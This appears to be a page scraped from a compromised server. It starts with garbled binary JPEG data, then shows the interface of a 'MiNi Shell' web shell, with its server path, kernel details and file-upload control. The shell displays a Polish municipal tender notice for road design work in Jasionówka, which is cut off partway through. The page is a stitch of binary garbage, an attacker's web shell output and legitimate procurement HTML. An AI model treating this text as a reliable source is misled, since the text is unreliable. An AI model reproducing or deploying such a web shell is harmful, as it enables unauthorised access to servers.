JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210303/0001282401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00012824 z dnia 2021-03-03</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej na przebudowę dróg </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA JASIONÓWKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 050659332</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jasionówka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-122</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL843 - Suwalski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">857278030</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">857278031</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@jasionowka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.ug.jasionowka.wrotapodlasia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej na przebudowę dróg </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b5b656b-7c03-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00012824</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002475/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przebudowa dr.gm.(dr.gm. w Krasnem Fol. do wsi Łękobudy, dr.gm.Kamionka-Romejki,dr.gm.Kamionka-Krzywa,dr.gm.Kąty-Jasionóweczka,Przebudowa dr. pow.Kalinówka Król.,Koziniec,Bud.GOZ(dok. projektowa)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.ug.jasionowka.wrotapodlasia.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym w Wykonawcą, odbywać się będzie przy użyciu środków komunikacji elektronicznej. 2. Komunikacja między Zamawiającym a Wykonawcami odbywać się będzie za pośrednictwem portalu – https://miniportal.uzp.gov.pl/, a po otwarciu ofert Zamawiający dodatkowo dopuszcza komunikację za pomocą poczty elektronicznej e-mail.3. W celu wzięcia udziału w postępowaniu, Wykonawca musi posiadać konto na Platformie. Rejestracja i utrzymywanie konta na Platformie, a także korzystnie z Platformy jest bezpłatne.4. Wymagania techniczne i organizacyjne korzystania z Platformy, instrukcja korzystania z Platformy znajdują się na stronie https://miniportal.uzp.gov.pl/.5. Zamawiający dopuszcza przesyłanie plików w formatach danych określonych w rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247) – w szczególności w formatach: .pdf, .doc, .docs, .rtf lub .odt, pades, xades. Zamawiający zaleca przesyłanie plików w formacie .pdf .6. Zalecenia Zamawiającego dotyczące kwalifikowanego podpisu elektronicznego:1) dla dokumentów w formacie .pdf zaleca się zastosowanie podpisu w formacie PadES lub XadEs,2) dla dokumentów w formacie innym niż .pdf zaleca się zastosowanie podpisu wewnętrznego w formacie XAdES. Wykonawca zobowiązany jest załączyć plik z dokumentem oraz plik z podpisem, czyli dwa pliki.7. Zamawiający nie przewiduje komunikowania się zamawiającego z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza dołączenie katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna w zamówieniach publicznych	Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z nia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (Ogólne rozporządzenie o ochronie danych), dalej : RODO, informujemy, że: 1. Administratorem Pani/Pana danych osobowych jest Gmina Jasionówka z siedzibą Urzędu Gminy Jasionówka, ul. Rynek 19, 19-122 Jasionówka, której przedstawicielem jest Wójt Gminy Jasionówka. 2. Administrator wyznaczył Inspektora Ochrony Danych Osobowych, z którym można kontaktować się pod adresem email: iodo@gryfon.com.pl, tel. 575 435 897. 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego. 4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o ustawę z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „ustawa Pzp”. 5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. 6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp. 7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO. 8. Posiada Pani/Pan: a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, c) na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO. 9. Nie przysługuje Pani/Panu: a) związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Or.271.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 126951,22 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonania dokumentacji projektowej na przebudowę: drogi gminnej Nr 104004B od drogi krajowej Nr 8 (Krasne Folwarczne) - Krasne Folwarczne - do drogi powiatowej Nr 1401B (wieś Łękobudy) na odcinku od końca istniejącego asfaltu w m. Krasne Folwarczne do drogi powiatowej Nr 1401B we wsi Łękobudy (obecnie nawierzchnia żwirowo-gruntowa) </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 24161,97 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej na przebudowę drogi gminnej Nr 103423B od granicy gminy (Romejki) - Kamionka - Słomianka - do drogi wojewódzkiej Nr 671 na odcinku od końca istniejącego asfaltu w m. Kamionka do granicy gminy (obecnie nawierzchnia żwirowo-gruntowa); </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 35981,80 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe projektanta</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> 1. Przy wyborze oferty zamawiający będzie się kierował następującymi kryteriami oceny ofert i ich znaczeniem:1) cena ofertowa brutto - 60%2) doświadczenie projektanta w specjalności drogowej – 40%	gdzie 1% = 1 pktAd 1) ocena ofert w kryterium „cena ofertowa” (C) nastąpi wg następującego wzoru:C = (C min ÷ C o) x 60 pktgdzie:C – liczba punktów w kryterium ceny ofertowejC min – najniższa cena spośród ofert nieodrzuconychC o – cena oferty badanejOferta może uzyskać w zakresie kryterium ceny ofertowej (C) maksymalnie 60 punktów.	Ad 2) kryterium „doświadczenie projektanta w specjalności drogowej” „D”Ocena ofert w kryterium „doświadczenie projektanta w specjalności drogowej” dotyczy doświadczenia osoby skierowanej do realizacji niniejszego zamówienia jako projektanta posiadającej odpowiednie uprawnienia do projektowania w specjalności drogowej , która wykonała dokumentacje projektowe dotyczące projektu budowy lub przebudowy, lub rozbudowy drogi / ulicy publicznej , będzie przeprowadzona zgodnie z formułą: 2 opracowania dokumentacji projektowej, o której mowa wyżej – 0 pkt, 3-4 opracowania dokumentacji projektowej, o której mowa wyżej – 10 pkt, 5-6 opracowań dokumentacji projektowej, o której mowa wyżej – 20 pkt, 7-8 opracowań dokumentacji projektowej, o której mowa wyżej – 30 pkt, 9 i więcej opracowań dokumentacji projektowej, o której mowa wyżej – 40 pkt. Oferta może uzyskać w zakresie kryterium „D” maksymalnie 40 punktów. 2. Za ofertę najkorzystniejszą uznana zostanie oferta, która otrzyma największą liczbę punktów, obliczoną według poniższego wzoru:W = C + Dgdzie: W - wartość punktowa oferty,C - ilość punktów za kryterium: cena ofertowa brutto,D- ilość punktów za kryterium: doświadczenie projektanta w specjalności drogowej,Łącznie oferta może uzyskać maksymalnie 100 pkt. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie dokumentacji projektowej na przebudowę drogi gminnej Nr 104002B od drogi powiatowej Nr 1357B (Bobrówka - Kamionka) - Krzywa - do drogi powiatowej Nr 1357B (Kamionka - droga wojewódzka Nr 671) na odcinku od drogi powiatowej Nr 